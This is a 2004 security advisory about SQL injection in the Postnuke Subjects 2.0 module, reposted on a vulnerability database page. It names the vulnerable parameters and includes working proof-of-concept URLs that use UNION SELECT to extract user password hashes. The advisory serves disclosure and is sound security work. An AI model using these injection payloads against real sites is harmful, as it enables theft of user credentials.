Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

subjects2.txt

🗓️ 10 Sep 2004 00:00:00Reported by criolabs.netType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Vulnerable Postnuke Subjects module 2.0 permits SQL-Injection, no current solution available.

Code
`****************************************************************************************************  
CRIOLABS  
  
  
- Software: Subjects 2.0   
- Type: Postnuke module  
- Vendor: Postnuke Modules Factory.  
  
  
  
****************************************************************************************************  
  
  
  
## Software ##  
  
Software: Subjects Postnuke module  
Version: 2.0  
Plataforms: Unix/Win/PHP/MySQL/Postnuke  
Web: http://home.postnuke.ru  
  
  
## Vendor Description ##  
  
Module is designed for structured store & display text content with a possibility to store  
content in file on the disc. Probably, the best one for converting existing based on HTML pages  
site to PostNuke.  
  
  
  
## Vulnerabilities ##  
  
Sql-Injection in pageid, subid, catid variables.  
  
  
  
## Sql-Injection ##  
  
  
The previous variables are vulnerables to SQL-Injection attacks.  
These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.  
  
/index.php?module=subjects&func=listpages&subid=[SQL]  
/index.php?module=subjects&func=viewpage&pageid=[SQL]  
/index.php?module=subjects&func=listcat&catid=[SQL]  
  
  
## Proof of Concept ##  
  
  
URL to retrieve the MD5 password hash of a user. This POC needs UNION functionality enabled in Mysql to retrieve  
the hash.  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null  
%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null  
%20FROM%20nuke_users%20WHERE%20pn_uid=2/*   
  
  
  
## History ##  
  
  
Vendor contacted but no response.  
  
  
  
## Solution ##  
  
  
There is no solution at this time, we recommend to remove immediately this module  
  
  
  
## Credits ##  
  
  
Criolabs staff  
http://www.criolabs.net   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Sep 2004 00:00Current
7.4High risk
Vulners AI Score7.4
postnuke modulesql injectionvendor responseremove moduleproof of concept.
26